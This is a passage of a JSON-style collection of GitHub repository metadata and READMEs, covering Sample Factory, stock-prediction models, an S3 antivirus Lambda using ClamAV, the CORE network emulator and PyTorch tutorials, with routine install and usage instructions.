\u8bbe\u5907\u5c4f\u5e55\u5750\u6807\u7cfb\u539f\u70b9\u90fd\u5728\u6700\u5de6\u4e0a\u89d2\uff0c\u5f80\u53f3x\u8f74\u9012\u589e\uff0c\u5f80\u4e0by\u8f74\u9012\u589e\n\n# [\u8fdb\u4ea4\u6d41\u7fa4]()\n![avatar](https://github.com/yanchunhuo/resources/blob/master/wechat.png)\n\n\n[![Stargazers over 
time](https://starchart.cc/yanchunhuo/AutomationTest.svg)](https://starchart.cc/yanchunhuo/AutomationTest)\n\n[![Top Langs](https://profile-counter.glitch.me/yanchunhuo/count.svg)](https://github.com/yanchunhuo)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alex-petrenko/sample-factory", "link": "https://github.com/alex-petrenko/sample-factory", "tags": ["reinforcement-learning"], "stars": 515, "description": "High throughput synchronous and asynchronous reinforcement learning", "lang": "Python", "repo_lang": "", "readme": "[![tests](https://github.com/alex-petrenko/sample-factory/actions/workflows/test-ci.yml/badge.svg?branch=master)](https://github.com/alex-petrenko/sample-factory/actions/workflows/test-ci.yml)\n[![codecov](https://codecov.io/gh/alex-petrenko/sample-factory/branch/master/graph/badge.svg?token=9EHMIU5WYV)](https://codecov.io/gh/alex-petrenko/sample-factory)\n[![pre-commit](https://github.com/alex-petrenko/sample-factory/actions/workflows/pre-commit.yml/badge.svg?branch=master)](https://github.com/alex-petrenko/sample-factory/actions/workflows/pre-commit.yml)\n[![docs](https://github.com/alex-petrenko/sample-factory/actions/workflows/docs.yml/badge.svg)](https://samplefactory.dev)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Imports: isort](https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336)](https://pycqa.github.io/isort/)\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/alex-petrenko/sample-factory/blob/master/LICENSE)\n[![Downloads](https://pepy.tech/badge/sample-factory)](https://pepy.tech/project/sample-factory)\n[](https://discord.gg/BCfHWaSMkr)\n\n\n\n\n# Sample Factory\n\nHigh-throughput reinforcement learning codebase. Version 2.0.0 is out! \ud83e\udd17\n\n**Resources:**\n\n* **Documentation:** [https://samplefactory.dev](https://samplefactory.dev) \n\n* **Paper:** https://arxiv.org/abs/2006.11751\n\n* **Citation:** [BibTeX](https://github.com/alex-petrenko/sample-factory#citation)\n\n* **Discord:** [https://discord.gg/BCfHWaSMkr](https://discord.gg/BCfHWaSMkr)\n\n* **Twitter (for updates):** [@petrenko_ai](https://twitter.com/petrenko_ai)\n\n* **Talk (circa 2021):** https://youtu.be/lLG17LKKSZc\n\n### What is Sample Factory?\n\nSample Factory is one of the fastest RL libraries.\nWe focused on very efficient synchronous and asynchronous implementations of policy gradients (PPO). \n\nSample Factory is thoroughly tested, used by many researchers and practitioners, and is actively maintained.\nOur implementation is known to reach SOTA performance in a variety of domains in a short amount of time.\nClips below demonstrate ViZDoom, IsaacGym, DMLab-30, Megaverse, Mujoco, and Atari agents trained with Sample Factory:\n\n

\n*(Demo clips: VizDoom, IsaacGym, DMLab-30, Megaverse, Mujoco, and Atari agents.)*\n

\n\n**Key features:**\n\n* Highly optimized algorithm [architecture](https://www.samplefactory.dev/06-architecture/overview/) for maximum learning throughput\n* [Synchronous and asynchronous](https://www.samplefactory.dev/07-advanced-topics/sync-async/) training regimes\n* [Serial (single-process) mode](https://www.samplefactory.dev/07-advanced-topics/serial-mode/) for easy debugging\n* Optimal performance in both CPU-based and [GPU-accelerated environments](https://www.samplefactory.dev/09-environment-integrations/isaacgym/)\n* Single- & multi-agent training, self-play, supports [training multiple policies](https://www.samplefactory.dev/07-advanced-topics/multi-policy-training/) at once on one or many GPUs\n* Population-Based Training ([PBT](https://www.samplefactory.dev/07-advanced-topics/multi-policy-training/))\n* Discrete, continuous, hybrid action spaces\n* Vector-based, image-based, dictionary observation spaces\n* Automatically creates a model architecture by parsing action/observation space specification. Supports [custom model architectures](https://www.samplefactory.dev/03-customization/custom-models/)\n* Library is designed to be imported into other projects, [custom environments](https://www.samplefactory.dev/03-customization/custom-environments/) are first-class citizens\n* Detailed [WandB and Tensorboard summaries](https://www.samplefactory.dev/05-monitoring/metrics-reference/), [custom metrics](https://www.samplefactory.dev/05-monitoring/custom-metrics/)\n* [HuggingFace \ud83e\udd17 integration](https://www.samplefactory.dev/10-huggingface/huggingface/) (upload trained models and metrics to the Hub)\n* [Multiple](https://www.samplefactory.dev/09-environment-integrations/mujoco/) [example](https://www.samplefactory.dev/09-environment-integrations/atari/) [environment](https://www.samplefactory.dev/09-environment-integrations/vizdoom/) [integrations](https://www.samplefactory.dev/09-environment-integrations/dmlab/) with tuned parameters and trained models\n\nThis Readme provides only a brief overview of the library.\nVisit full documentation at [https://samplefactory.dev](https://samplefactory.dev) for more details.\n\n## Installation\n\nJust install from PyPI:\n\n```pip install sample-factory```\n\nSF is known to work on Linux and macOS. There is no Windows support at this time.\nPlease refer to the [documentation](https://samplefactory.dev) for additional environment-specific installation notes.\n\n## Quickstart\n\nUse command line to train an agent using one of the existing integrations, e.g. 
Mujoco (might need to run `pip install sample-factory[mujoco]`):\n\n```bash\npython -m sf_examples.mujoco.train_mujoco --env=mujoco_ant --experiment=Ant --train_dir=./train_dir\n```\n\nStop the experiment (Ctrl+C) when the desired performance is reached and then evaluate the agent:\n\n```bash\npython -m sf_examples.mujoco.enjoy_mujoco --env=mujoco_ant --experiment=Ant --train_dir=./train_dir\n```\n\nDo the same in a pixel-based VizDoom environment (might need to run `pip install sample-factory[vizdoom]`, please also see docs for VizDoom-specific instructions):\n\n```bash\npython -m sf_examples.vizdoom.train_vizdoom --env=doom_basic --experiment=DoomBasic --train_dir=./train_dir --num_workers=16 --num_envs_per_worker=10 --train_for_env_steps=1000000\npython -m sf_examples.vizdoom.enjoy_vizdoom --env=doom_basic --experiment=DoomBasic --train_dir=./train_dir\n```\n\nMonitor any running or completed experiment with Tensorboard:\n\n```bash\ntensorboard --logdir=./train_dir\n```\n(or see the docs for WandB integration).\n\nTo continue from here, copy and modify one of the existing env integrations to train agents in your own custom environment. We provide\nexamples for all kinds of supported environments, please refer to the [documentation](https://samplefactory.dev) for more details.\n\n## Acknowledgements\n\nThis project would not be possible without amazing contributions from many people. I would like to thank:\n\n* [Vladlen Koltun](https://vladlen.info) for amazing guidance and support, especially in the early stages of the project, for\nhelping me solidify the ideas that eventually became this library.\n* My academic advisor [Gaurav Sukhatme](https://viterbi.usc.edu/directory/faculty/Sukhatme/Gaurav) for supporting this project\nover the years of my PhD and for being overall an awesome mentor.\n* [Zhehui Huang](https://zhehui-huang.github.io/) for his contributions to the original ICML submission, his diligent work on\ntesting and evaluating the library and for adopting it in his own research.\n* [Edward Beeching](https://edbeeching.github.io/) for his numerous awesome contributions to the codebase, including\nhybrid action distributions, new version of the custom model builder, multiple environment integrations, and also\nfor promoting the library through the HuggingFace integration!\n* [Andrew Zhang](https://andrewzhang505.github.io/) and [Ming Wang](https://www.mingwang.me/) for numerous contributions to the codebase and documentation during their HuggingFace internships!\n* [Thomas Wolf](https://thomwolf.io/) and others at HuggingFace for the incredible (and unexpected) support and for the amazing\nwork they are doing for the open-source community.\n* [Erik Wijmans](https://wijmans.xyz/) for feedback and insights and for his awesome implementation of RNN backprop using PyTorch's `PackedSequence`, multi-layer RNNs, and other features!\n* [Tushar Kumar](https://www.linkedin.com/in/tushartk/) for contributing to the original paper and for his help\nwith the [fast queue implementation](https://github.com/alex-petrenko/faster-fifo).\n* [Costa Huang](https://costa.sh/) for developing CleanRL, for his work on benchmarking RL algorithms, and for awesome feedback\nand insights!\n* [Denys Makoviichuk](https://github.com/Denys88/rl_games) for developing rl_games, a very fast RL library, for inspiration and \nfeedback on numerous features of this library (such as return normalizations, adaptive learning rate, and others).\n* [Eugene Vinitsky](https://eugenevinitsky.github.io/) for adopting this 
library in his own research and for his valuable feedback.\n* All my labmates at RESL who used Sample Factory in their projects and provided feedback and insights!\n\nHuge thanks to all the people who are not mentioned here for your code contributions, PRs, issues, and questions!\nThis project would not be possible without a community!\n\n## Citation\n\nIf you use this repository in your work or otherwise wish to cite it, please make reference to our ICML2020 paper.\n\n```\n@inproceedings{petrenko2020sf,\n author = {Aleksei Petrenko and\n Zhehui Huang and\n Tushar Kumar and\n Gaurav S. Sukhatme and\n Vladlen Koltun},\n title = {Sample Factory: Egocentric 3D Control from Pixels at 100000 {FPS}\n with Asynchronous Reinforcement Learning},\n booktitle = {Proceedings of the 37th International Conference on Machine Learning,\n {ICML} 2020, 13-18 July 2020, Virtual Event},\n series = {Proceedings of Machine Learning Research},\n volume = {119},\n pages = {7652--7662},\n publisher = {{PMLR}},\n year = {2020},\n url = {http://proceedings.mlr.press/v119/petrenko20a.html},\n biburl = {https://dblp.org/rec/conf/icml/PetrenkoHKSK20.bib},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\nFor questions, issues, inquiries please join Discord. \nGithub issues and pull requests are welcome! Check out the [contribution guidelines](https://www.samplefactory.dev/community/contribution/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sebastianheinz/stockprediction", "link": "https://github.com/sebastianheinz/stockprediction", "tags": [], "stars": 513, "description": "Data and code of my Medium story on stock prediction with TensorFlow", "lang": "Python", "repo_lang": "", "readme": "# A simple deep learning model for stock prediction using TensorFlow\n\nThis repository contains the Python script as well as the source dataset from my Medium.com article [\"A simple deep learning model for stock prediction using TensoFlow\"](https://medium.com/mlreview/a-simple-deep-learning-model-for-stock-price-prediction-using-tensorflow-30505541d877).\n\nPlease note, that the dataset is zipped due to Github file size restrictions. Feel free to clone and fork! :)\n\nIf you need any help in developing deep learning models in Python and TensorFlow contact my [\"data science consulting company STATWORX\"](https://www.statworx.com/de/data-science/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "philipxjm/Deep-Convolution-Stock-Technical-Analysis", "link": "https://github.com/philipxjm/Deep-Convolution-Stock-Technical-Analysis", "tags": ["stock-price-prediction", "convolutional-neural-networks", "neural-network", "technical-analysis", "stock-market"], "stars": 513, "description": "Uses Deep Convolutional Neural Networks (CNNs) to model the stock market using technical analysis. Predicts the future trend of stock selections.", "lang": "Python", "repo_lang": "", "readme": "# Neural Stock Market Prediction\nUses Deep Convolutional Neural Networks (CNNs) to model the stock market using technical analysis. Predicts the future trend of stock selections.\n\n## How does it work?\nConvolutional neural networks are designed to recognize complex patterns and features in images. 
It works by dividing an image up into multiple overlapping perceptive fields and running a myriad of trainable filters through them, capturing basic features and patterns. This process is repeated several times, and as the filtered image is ran through more filters, deeper and more meaningful features are extracted and quantified. For example, to recognize an image of a car we might have several filters that are sensitive to wheels, or windows, or exhaust pipes, or licence plates... and all of the results of these filters are gathered and quantified into a final classifier.\n\n\"CNN\"\n\nOK, that's great, but how does this tie in to stock analysis? Here we introduce the study of technical analysis. I'll let Investopedia's words describe it: \"Technical analysis is a trading tool employed to evaluate securities and attempt to forecast their future movement by analyzing statistics gathered from trading activity, such as price movement and volume. Unlike fundamental analysts who attempt to evaluate a security's intrinsic value, technical analysts focus on charts of price movement and various analytical tools to evaluate a security's strength or weakness and forecast future price changes.\" In other words, technical analysis focuses on the movement patterns and trading behaviors of stock selections to pinpoint a stock's future trend. Wait a minute, if technical analysis works by analysing the movement patterns of stocks, we can use CNN to model this analytical technique!\n\nFor example, we would have some filters that are sensitive to shortterm uptrends, and they will be combined by fully connected layers to be sensitive to longterm uptrends. The same goes for some complex patterns such as shortterm floats, or an overall downward trend capture.\n\nAs previously mentioned, CNN works by stacking several filters on top of each other to form complex feature-sensitive filters; if we were to treat stock data as images, we can apply CNN to it and extract useful and deep information. 
How do we go about this?\n\nInstead of convolving a 2D image, we convolved a 1D image, since stock data is linear and is represented as an 1D tensor.\n\n```python\ndef conv1d(input, output_dim,\n conv_w=9, conv_s=2,\n padding=\"SAME\", name=\"conv1d\",\n stddev=0.02, bias=False):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [conv_w, input.get_shape().as_list()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n c = tf.nn.conv1d(input, w, conv_s, padding=padding)\n\n if bias:\n b = tf.get_variable('b', [output_dim], initializer=tf.constant_initializer(0.0))\n return c + b\n\n return c\n```\n\nAlso, the input images is in the shape ```[batch_size, 128, 5]```, the moving-window (the length of data we will be looking at in one batch) the five channels being ```[Open, High, Low, Close, Volume]```, all information I deemed important for technical analysis.\n\nAfter several convolutional layers and batchnorms later, we arrive at a tensor sized ```[batch_size, 2, 1024]```, which we then run through several softmax layers and finally a sigmoid activation to result in a tensor sized ```[batch_size, 2]```, with two values, one representing the bullish confidence, and the other one the bearish confidence.\n\n## Materials for Consideration\n|Name|Link|\n|---|---|\n|Historical Data||\n|Description of Technical Analysis||\n|Berkeley paper on ANN-based analysis||\n\n## Data Format\n\n`19991118,0,42.2076,46.382,37.4581,39.1928,43981812.87`\n\n|Date|Time|Open|High|Low|Close|Volume|\n|---|---|---|---|---|---|---|\n|19991118|0|42.2076|46.382|37.4581|39.1928|43981812.87|\n\n## Usage\n\nThe trained model is proprietary, but you are absolutely welcome to train your own using my code.\n\nYou must have python 3.5+ and tensorflow installed, tensorflow-gpu highly recommended as the training requires a lot of computational power.\n\n```pip install tensorflow-gpu```\n\n```git clone https://github.com/philipxjm/Convolutional-Neural-Stock-Market-Technical-Analyser.git```\n\n```cd Convolutional-Neural-Stock-Market-Technical-Analyser```\n\n```python stock_model.py```\n\nOf course, you have to tinker with the hyper parameters, archeteture of the encoder, and the dataset setup if you want to achieve good results. Good luck and make some money.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bluesentry/bucket-antivirus-function", "link": "https://github.com/bluesentry/bucket-antivirus-function", "tags": [], "stars": 513, "description": "Serverless antivirus for cloud storage.", "lang": "Python", "repo_lang": "", "readme": "# bucket-antivirus-function\n\n[![CircleCI](https://circleci.com/gh/upsidetravel/bucket-antivirus-function.svg?style=svg)](https://circleci.com/gh/upsidetravel/bucket-antivirus-function)\n\nScan new objects added to any s3 bucket using AWS Lambda. 
[more details in this post](https://engineering.upside.com/s3-antivirus-scanning-with-lambda-and-clamav-7d33f9c5092e)\n\n## Features\n\n- Easy to install\n- Send events from an unlimited number of S3 buckets\n- Prevent reading of infected files using S3 bucket policies\n- Accesses the end-user\u2019s separate installation of\nopen source antivirus engine [ClamAV](http://www.clamav.net/)\n\n## How It Works\n\n![architecture-diagram](../master/images/bucket-antivirus-function.png)\n\n- Each time a new object is added to a bucket, S3 invokes the Lambda\nfunction to scan the object\n- The function package will download (if needed) current antivirus\ndefinitions from a S3 bucket. Transfer speeds between a S3 bucket and\nLambda are typically faster and more reliable than another source\n- The object is scanned for viruses and malware. Archive files are\nextracted and the files inside scanned also\n- The objects tags are updated to reflect the result of the scan, CLEAN\nor INFECTED, along with the date and time of the scan.\n- Object metadata is updated to reflect the result of the scan (optional)\n- Metrics are sent to [DataDog](https://www.datadoghq.com/) (optional)\n- Scan results are published to a SNS topic (optional) (Optionally choose to only publish INFECTED results)\n- Files found to be INFECTED are automatically deleted (optional)\n\n## Installation\n\n### Build from Source\n\nTo build the archive to upload to AWS Lambda, run `make all`. The build process is completed using\nthe [amazonlinux](https://hub.docker.com/_/amazonlinux/) [Docker](https://www.docker.com)\n image. The resulting archive will be built at `build/lambda.zip`. This file will be\n uploaded to AWS for both Lambda functions below.\n\n### Create Relevant AWS Infra via CloudFormation\n\nUse CloudFormation with the `cloudformation.yaml` located in the `deploy/` directory to quickly spin up the AWS infra needed to run this project. CloudFormation will create:\n\n- An S3 bucket that will store AntiVirus definitions.\n- A Lambda Function called `avUpdateDefinitions` that will update the AV Definitions in the S3 Bucket every 3 hours.\nThis function accesses the user\u2019s above S3 Bucket to download updated definitions using `freshclam`.\n- A Lambda Function called `avScanner` that is triggered on each new S3 object creation which scans the object and tags it appropriately. It is created with `1600mb` of memory which should be enough, however if you start to see function timeouts, this memory may have to be bumped up. In the past, we recommended using `1024mb`, but that has started causing Lambda timeouts and bumping this memory has resolved it.\n\nRunning CloudFormation, it will ask for 2 inputs for this stack:\n\n1. BucketType: `private` (default) or `public`. This is applied to the S3 bucket that stores the AntiVirus definitions. We recommend to only use `public` when other AWS accounts need access to this bucket.\n2. SourceBucket: [a non-empty string]. The name (do not include `s3://`) of the S3 bucket that will have its objects scanned. _Note - this is just used to create the IAM Policy, you can add/change source buckets later via the IAM Policy that CloudFormation outputs_\n\nAfter the Stack has successfully created, there are 3 manual processes that still have to be done:\n\n1. Upload the `build/lambda.zip` file that was created by running `make all` to the `avUpdateDefinitions` and `avScanner` Lambda functions via the Lambda Console.\n2. 
To trigger the Scanner function on new S3 objects, go to the `avScanner` Lambda function console, navigate to `Configuration` -> `Trigger` -> `Add Trigger` -> Search for S3, and choose your bucket(s) and select `All object create events`, then click `Add`. _Note - if you chose more than 1 bucket as the source, or chose a different bucket than the Source Bucket in the CloudFormation parameter, you will have to also edit the IAM Role to reflect these new buckets (see \"Adding or Changing Source Buckets\")_\n3. Navigate to the `avUpdateDefinitions` Lambda function and manually trigger the function to get the initial Clam definitions in the bucket (instead of waiting for the 3 hour trigger to happen). Do this by clicking the `Test` section, and then clicking the orange `test` button. The function should take a few seconds to execute, and when finished you should see the `clam_defs` in the `av-definitions` S3 bucket.\n\n#### Adding or Changing Source Buckets\n\nChanging or adding Source Buckets is done by editing the `AVScannerLambdaRole` IAM Role. More specifically, the `S3AVScan` and `KmsDecrypt` parts of that IAM Role's policy.\n\n### S3 Events\n\nConfigure scanning of additional buckets by adding a new S3 event to\ninvoke the Lambda function. This is done from the properties of any\nbucket in the AWS console.\n\n![s3-event](../master/images/s3-event.png)\n\nNote: If configured to update object metadata, events must only be\nconfigured for `PUT` and `POST`. Metadata is immutable, which requires\nthe function to copy the object over itself with updated metadata. This\ncan cause a continuous loop of scanning if improperly configured.\n\n## Configuration\n\nRuntime configuration is accomplished using environment variables. See\nthe table below for reference.\n\n| Variable | Description | Default | Required |\n| --- | --- | --- | --- |\n| AV_DEFINITION_S3_BUCKET | Bucket containing antivirus definition files | | Yes |\n| AV_DEFINITION_S3_PREFIX | Prefix for antivirus definition files | clamav_defs | No |\n| AV_DEFINITION_PATH | Path containing files at runtime | /tmp/clamav_defs | No |\n| AV_SCAN_START_SNS_ARN | SNS topic ARN to publish notification about start of scan | | No |\n| AV_SCAN_START_METADATA | The tag/metadata indicating the start of the scan | av-scan-start | No |\n| AV_SIGNATURE_METADATA | The tag/metadata name representing file's AV type | av-signature | No |\n| AV_STATUS_CLEAN | The value assigned to clean items inside of tags/metadata | CLEAN | No |\n| AV_STATUS_INFECTED | The value assigned to clean items inside of tags/metadata | INFECTED | No |\n| AV_STATUS_METADATA | The tag/metadata name representing file's AV status | av-status | No |\n| AV_STATUS_SNS_ARN | SNS topic ARN to publish scan results (optional) | | No |\n| AV_STATUS_SNS_PUBLISH_CLEAN | Publish AV_STATUS_CLEAN results to AV_STATUS_SNS_ARN | True | No |\n| AV_STATUS_SNS_PUBLISH_INFECTED | Publish AV_STATUS_INFECTED results to AV_STATUS_SNS_ARN | True | No |\n| AV_TIMESTAMP_METADATA | The tag/metadata name representing file's scan time | av-timestamp | No |\n| CLAMAVLIB_PATH | Path to ClamAV library files | ./bin | No |\n| CLAMSCAN_PATH | Path to ClamAV clamscan binary | ./bin/clamscan | No |\n| FRESHCLAM_PATH | Path to ClamAV freshclam binary | ./bin/freshclam | No |\n| DATADOG_API_KEY | API Key for pushing metrics to DataDog (optional) | | No |\n| AV_PROCESS_ORIGINAL_VERSION_ONLY | Controls that only original version of an S3 key is processed (if bucket versioning is enabled) | False | No |\n| 
AV_DELETE_INFECTED_FILES | Controls whether infected files should be automatically deleted | False | No |\n| EVENT_SOURCE | The source of antivirus scan event \"S3\" or \"SNS\" (optional) | S3 | No |\n| S3_ENDPOINT | The Endpoint to use when interacting wth S3 | None | No |\n| SNS_ENDPOINT | The Endpoint to use when interacting wth SNS | None | No |\n| LAMBDA_ENDPOINT | The Endpoint to use when interacting wth Lambda | None | No |\n\n## S3 Bucket Policy Examples\n\n### Deny to download the object if not \"CLEAN\"\n\nThis policy doesn't allow to download the object until:\n\n1. The lambda that run Clam-AV is finished (so the object has a tag)\n2. The file is not CLEAN\n\nPlease make sure to check cloudtrail for the arn:aws:sts, just find the event open it and copy the sts.\nIt should be in the format provided below:\n\n```json\n {\n \"Effect\": \"Deny\",\n \"NotPrincipal\": {\n \"AWS\": [\n \"arn:aws:iam::<>:role/<>\",\n \"arn:aws:sts::<>:assumed-role/<>/<>\",\n \"arn:aws:iam::<>:root\"\n ]\n },\n \"Action\": \"s3:GetObject\",\n \"Resource\": \"arn:aws:s3:::<>/*\",\n \"Condition\": {\n \"StringNotEquals\": {\n \"s3:ExistingObjectTag/av-status\": \"CLEAN\"\n }\n }\n}\n```\n\n### Deny to download and re-tag \"INFECTED\" object\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Deny\",\n \"Action\": [\"s3:GetObject\", \"s3:PutObjectTagging\"],\n \"Principal\": \"*\",\n \"Resource\": [\"arn:aws:s3:::<>/*\"],\n \"Condition\": {\n \"StringEquals\": {\n \"s3:ExistingObjectTag/av-status\": \"INFECTED\"\n }\n }\n }\n ]\n}\n```\n\n## Manually Scanning Buckets\n\nYou may want to scan all the objects in a bucket that have not previously been scanned or were created\nprior to setting up your lambda functions. To do this you can use the `scan_bucket.py` utility.\n\n```sh\npip install boto3\nscan_bucket.py --lambda-function-name= --s3-bucket-name=\n```\n\nThis tool will scan all objects that have not been previously scanned in the bucket and invoke the lambda function\nasynchronously. As such you'll have to go to your cloudwatch logs to see the scan results or failures. Additionally,\nthe script uses the same environment variables you'd use in your lambda so you can configure them similarly.\n\n## Testing\n\nThere are two types of tests in this repository. The first is pre-commit tests and the second are python tests. All of\nthese tests are run by CircleCI.\n\n### pre-commit Tests\n\nThe pre-commit tests ensure that code submitted to this repository meet the standards of the repository. To get started\nwith these tests run `make pre_commit_install`. This will install the pre-commit tool and then install it in this\nrepository. Then the github pre-commit hook will run these tests before you commit your code.\n\nTo run the tests manually run `make pre_commit_tests` or `pre-commit run -a`.\n\n### Python Tests\n\nThe python tests in this repository use `unittest` and are run via the `nose` utility. To run them you will need\nto install the developer resources and then run the tests:\n\n```sh\npip install -r requirements.txt\npip install -r requirements-dev.txt\nmake test\n```\n\n### Local lambdas\n\nYou can run the lambdas locally to test out what they are doing without deploying to AWS. This is accomplished\nby using docker containers that act similarly to lambda. You will need to have set up some local variables in your\n`.envrc.local` file and modify them appropriately first before running `direnv allow`. 
If you do not have `direnv`\nit can be installed with `brew install direnv`.\n\nFor the Scan lambda you will need a test file uploaded to S3 and the variables `TEST_BUCKET` and `TEST_KEY`\nset in your `.envrc.local` file. Then you can run:\n\n```sh\ndirenv allow\nmake archive scan\n```\n\nIf you want a file that will be recognized as a virus you can download a test file from the [EICAR](https://www.eicar.org/?page_id=3950)\nwebsite and uploaded to your bucket.\n\nFor the Update lambda you can run:\n\n```sh\ndirenv allow\nmake archive update\n```\n\n## License\n\n```text\nUpside Travel, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n```\n\nClamAV is released under the [GPL Version 2 License](https://github.com/vrtadmin/clamav-devel/blob/master/COPYING)\nand all [source for ClamAV](https://github.com/vrtadmin/clamav-devel) is available\nfor download on Github.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coreemu/core", "link": "https://github.com/coreemu/core", "tags": ["python", "network", "emulator", "emulation", "emulating-networks", "emane", "wireless", "rf"], "stars": 513, "description": "Common Open Research Emulator", "lang": "Python", "repo_lang": "", "readme": "# CORE\nCORE: Common Open Research Emulator\n\nCopyright (c)2005-2022 the Boeing Company.\n\nSee the LICENSE file included in this distribution.\n\n## About\nThe Common Open Research Emulator (CORE) is a tool for emulating\nnetworks on one or more machines. You can connect these emulated\nnetworks to live networks. CORE consists of a GUI for drawing\ntopologies of lightweight virtual machines, and Python modules for\nscripting network emulation.\n\n## Quick Start\nRequires Python 3.9+. More detailed instructions and install options can be found\n[here](https://coreemu.github.io/core/install.html).\n\n### Package Install\nGrab the latest deb/rpm from [releases](https://github.com/coreemu/core/releases).\n\nThis will install vnoded/vcmd, system dependencies, and CORE within a python\nvirtual environment at `/opt/core/venv`.\n```shell\nsudo install -y ./\n```\n\nThen install OSPF MDR from source:\n```shell\ngit clone https://github.com/USNavalResearchLaboratory/ospf-mdr.git\ncd ospf-mdr\n./bootstrap.sh\n./configure --disable-doc --enable-user=root --enable-group=root \\\n --with-cflags=-ggdb --sysconfdir=/usr/local/etc/quagga --enable-vtysh \\\n --localstatedir=/var/run/quagga\nmake -j$(nproc)\nsudo make install\n```\n\n### Script Install\nThe following should get you up and running on Ubuntu 22.04. 
This would\ninstall CORE into a python3 virtual environment and install\n[OSPF MDR](https://github.com/USNavalResearchLaboratory/ospf-mdr) from source.\n\n```shell\ngit clone https://github.com/coreemu/core.git\ncd core\n# install dependencies to run installation task\n./setup.sh\n# run the following or open a new terminal\nsource ~/.bashrc\n# Ubuntu\ninv install\n# CentOS\ninv install -p /usr\n```\n\n## Documentation & Support\nWe are leveraging GitHub hosted documentation and Discord for persistent\nchat rooms. This allows for more dynamic conversations and the\ncapability to respond faster. Feel free to join us at the link below.\n\n* [Documentation](https://coreemu.github.io/core/)\n* [Discord Channel](https://discord.gg/AKd7kmP)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ne7ermore/torch-light", "link": "https://github.com/ne7ermore/torch-light", "tags": ["deep-learning", "pytorch", "reinforcement-learning"], "stars": 513, "description": "Deep-learning by using Pytorch. Basic nns like Logistic, CNN, RNN, LSTM and some examples are implemented by complex model. ", "lang": "Python", "repo_lang": "", "readme": "

\n\n--------------------------------------------------------------------------------\n\nThis repository includes basic and advanced examples of deep learning using [Pytorch](http://pytorch.org/).\n
\nThe basics (simple nns such as logistic regression, CNN, RNN, and LSTM) are implemented in a few lines of code, while the advanced examples are implemented with more complex models.\n
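\nAs a rough illustration of what a few lines of code means here (a sketch that is not taken from this repository's examples; the layer sizes, learning rate, and random tensors are placeholders chosen for demonstration), a logistic-regression style basic nn can be defined and trained in PyTorch roughly like this:\n
\n```python\nimport torch\nimport torch.nn as nn\n\n# Toy sketch (not from this repo): a logistic-regression basic nn.\n# The sizes and the random tensors are placeholders for real data.\nmodel = nn.Sequential(nn.Linear(10, 1), nn.Sigmoid())\noptimizer = torch.optim.SGD(model.parameters(), lr=0.1)\nloss_fn = nn.BCELoss()\n\nx = torch.randn(64, 10)                   # fake features\ny = torch.randint(0, 2, (64, 1)).float()  # fake binary labels\n\nfor _ in range(100):\n    optimizer.zero_grad()\n    loss = loss_fn(model(x), y)\n    loss.backward()\n    optimizer.step()\n```\n
\nMore complex PyTorch models generally follow the same pattern: define a model, a loss, and an optimizer, then loop over forward, backward, and step.\n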
\nIt is better finish [Official Pytorch Tutorial](http://pytorch.org/tutorials/index.html) before this.\n\n##### Continue updating...\n\n## Tutorial\nGet tutorial series in [Blog](https://ne7ermore.github.io/) if know Chinese\n\n## Tabel of Pytorch Examples\n\n#### 1. Basics\n\n* [Cbow](https://github.com/ne7ermore/torch-light/tree/master/cbow)\n* [N-Gram](https://github.com/ne7ermore/torch-light/tree/master/ngram)\n* [CNN Text classfication](https://github.com/ne7ermore/torch-light/tree/master/cnn-text-classfication)\n* [LSTM Text classfication](https://github.com/ne7ermore/torch-light/tree/master/lstm-text-classfication)\n\n#### 2. Reinforcement Training\n* [AlphaGo-Zero](https://github.com/ne7ermore/torch-light/tree/master/alpha-zero)\n* [Image-Cap](https://github.com/ne7ermore/torch-light/tree/master/Image-Cap)\n* [Reinforced Translate](https://github.com/ne7ermore/torch-light/tree/master/reinforced-translate)\n* [Toy](https://github.com/ne7ermore/torch-light/tree/master/gym)\n\n#### 3. NLP\n* [Poetry VAE-NLG](https://github.com/ne7ermore/torch-light/tree/master/vae-nlg)\n* [Seq2seq](https://github.com/ne7ermore/torch-light/tree/master/seq2seq)\n* [BiLSTM CRF NER](https://github.com/ne7ermore/torch-light/tree/master/biLSTM-CRF)\n* [LSTM CNNs CRF](https://github.com/ne7ermore/torch-light/tree/master/LSTM-CNNs-CRF)\n* [Chinese Poetry NLG](https://github.com/ne7ermore/torch-light/tree/master/ch-poetry-nlg)\n* [BiMPM](https://github.com/ne7ermore/torch-light/tree/master/biMPM)\n* [Pair Ranking Cnn](https://github.com/ne7ermore/torch-light/tree/master/pair-ranking-cnn)\n* [BiLSTM CRF](https://github.com/ne7ermore/torch-light/tree/master/biLSTM-CRF-cut)\n* [Capsule Text classfication](https://github.com/ne7ermore/torch-light/tree/master/capsule-classfication)\n* [Retrieval Based Chatbots](https://github.com/ne7ermore/torch-light/tree/master/retrieval-based-chatbots)\n* [Hierarchical for Summarization and Classification](https://github.com/ne7ermore/torch-light/tree/master/hierarchical-sc)\n* [Deep 